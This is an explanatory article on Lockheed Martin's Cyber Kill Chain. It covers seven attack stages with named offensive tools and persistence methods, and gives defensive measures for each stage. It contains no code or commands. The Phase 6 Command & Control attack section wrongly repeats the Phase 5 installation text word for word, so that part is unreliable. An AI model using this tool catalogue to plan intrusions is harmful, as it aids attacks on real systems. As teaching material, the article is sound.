The Cyber Kill Chain: Lockheed Martin’s Cyber Attack Model
The Cyber Kill Chain is a step-by-step plan hackers use to attack a system.
The Cyber Kill Chain Has 7 Stages:
Reconnaissance: Gathering info on the target to plan the attack.
Weaponization: Creating a malicious tool, like a virus.
Delivery: Sending the tool to the target, often via email or a link.
Exploitation: Using a weakness to get the tool inside.
Installation: Setting up the virus to stay in the system.
Command & Control: Letting the hacker control the system remotely.
Actions on Objectives: Doing the final goal, like stealing data or causing damage.
This model enables defenders to detect and prevent attacks at any stage. It also supports red team operators in executing coordinated attacks, ensuring thorough and effective exploitation of the target system.
Phase 1: Reconnaissance
This phase involves collecting critical information about the target, such as IP addresses, domain names, employee details, network infrastructure, or system vulnerabilities, to craft a tailored attack plan.
Popular frameworks and tools include OSINT (Open-Source Intelligence) platforms like Maltego, reconnaissance tools like Nmap and Recon-ng, social engineering tools like theHarvester, and web scraping utilities like SpiderFoot.
Phase 2: Weaponization
Here, attackers create or customize malicious tools, such as viruses, ransomware, or trojans, by embedding exploits into deliverable formats like PDFs, executables, or Office documents.
Common tools include Metasploit for exploit development, Veil Framework for crafting payloads, and exploit kits like Angler or Nuclear for automated weaponization.
Phase 3: Delivery
This stage focuses on transmitting the malicious payload to the target, often through phishing emails, malicious links, compromised websites, USB drives, or watering hole attacks.
Popular methods include using phishing frameworks like SET (Social-Engineer Toolkit), email spoofing tools like SpoofWorks, and exploit delivery systems like Browser Exploitation Framework (BeEF).
Phase 4: Exploitation
Attackers exploit vulnerabilities in the target system, such as unpatched software, misconfigured servers, or weak authentication, to gain initial access or elevate privileges.
Widely used tools include Metasploit, Exploit-DB for vulnerability databases, Burp Suite for web exploitation, and custom scripts or zero-day exploits tailored to specific weaknesses.
Phase 5: Installation
In this phase, malware is installed to maintain persistent access, achieved through methods like cron jobs on Unix-like systems, registry key modifications (e.g., Run and RunOnce keys) on Windows, scheduled tasks via Task Scheduler, service creation, WMI event subscriptions, or deploying backdoors and rootkits.
Tools like PowerShell Empire, Cobalt Strike, Backdoor Factory, and persistence frameworks like PoshC2 are commonly employed.
Phase 6: Command & Control
In this phase, malware is installed to maintain persistent access, achieved through methods like cron jobs on Unix-like systems, registry key modifications (e.g., Run and RunOnce keys) on Windows, scheduled tasks via Task Scheduler, service creation, WMI event subscriptions, or deploying backdoors and rootkits.
Tools like PowerShell Empire, Cobalt Strike, Backdoor Factory, and persistence frameworks like PoshC2 are commonly employed.
Phase 7: Actions on Objectives
The final phase involves executing the attacker's goal, such as data exfiltration, system disruption, deploying additional malware, ransomware encryption, or lateral movement within the network.
Tools like Mimikatz for credential harvesting, FileZilla or WinSCP for data transfer, ransomware kits like Locky or Ryuk, and post-exploitation frameworks like BloodHound for network mapping are frequently used.
Defending Each Stage of the Cyber Kill Chain
The Cyber Kill Chain model empowers defenders to proactively mitigate attacks by addressing each of its seven stages with tailored strategies and tools:
Phase 1: Reconnaissance
Defenders can monitor and restrict public-facing information, such as employee data or network details, using tools like DMARC and SPF records to prevent email spoofing.
Implementing network security monitoring with solutions like Splunk or Elastic Stack, and conducting regular OSINT audits with tools like Maltego, helps detect and disrupt early reconnaissance efforts.
Phase 2: Weaponization
Defenders can reduce risks by keeping software and systems patched and updated, using vulnerability management tools like Nessus or Qualys to identify weaknesses.
Employing sandboxing environments (e.g., Cuckoo Sandbox) to analyze suspicious files and restricting executable file types on endpoints further limits the creation or deployment of malicious tools.
Phase 3: Delivery
Defenders can block malicious deliveries by deploying email filters (e.g., Proofpoint) to catch phishing attempts, using web gateways like Zscaler to filter malicious links, and educating users with security awareness training.
Network intrusion detection systems (NIDS) like Snort or Suricata can also identify and block unusual traffic patterns associated with payload delivery.
Phase 4: Exploitation
Defenders can prevent exploitation by regularly patching vulnerabilities, using endpoint detection and response (EDR) tools like CrowdStrike or Microsoft Defender to detect exploits in real-time, and enforcing the principle of least privilege to limit access. Web application firewalls (WAFs) like ModSecurity can also protect against web-based exploits.
Phase 5: Installation
Defenders can thwart installation by monitoring for unauthorized changes with file integrity monitoring (FIM) tools like Tripwire, restricting administrative privileges, and using antivirus or EDR solutions to detect and remove malware.
Disabling unnecessary services, auditing cron jobs, and locking down registry keys or scheduled tasks further enhance persistence prevention.
Phase 6: Command & Control (C2)
Defenders can disrupt C2 communications by monitoring outbound traffic with network security tools like Palo Alto Networks or Darktrace, blocking known malicious domains with DNS filtering (e.g., Cisco Umbrella), and using behavior-based detection to identify encrypted C2 channels. Segmenting networks and enforcing zero-trust policies also limit lateral movement.
Phase 7: Actions on Objectives
Defenders can mitigate the impact by implementing data loss prevention (DLP) tools like Symantec DLP to prevent exfiltration, using SIEM systems (e.g., Splunk, QRadar) to detect anomalous activities, and maintaining offline backups to recover from ransomware or disruptions.
Incident response plans and rapid containment strategies can minimize damage and restore operations. This model enables defenders to detect and prevent attacks at any stage, enhancing overall security posture.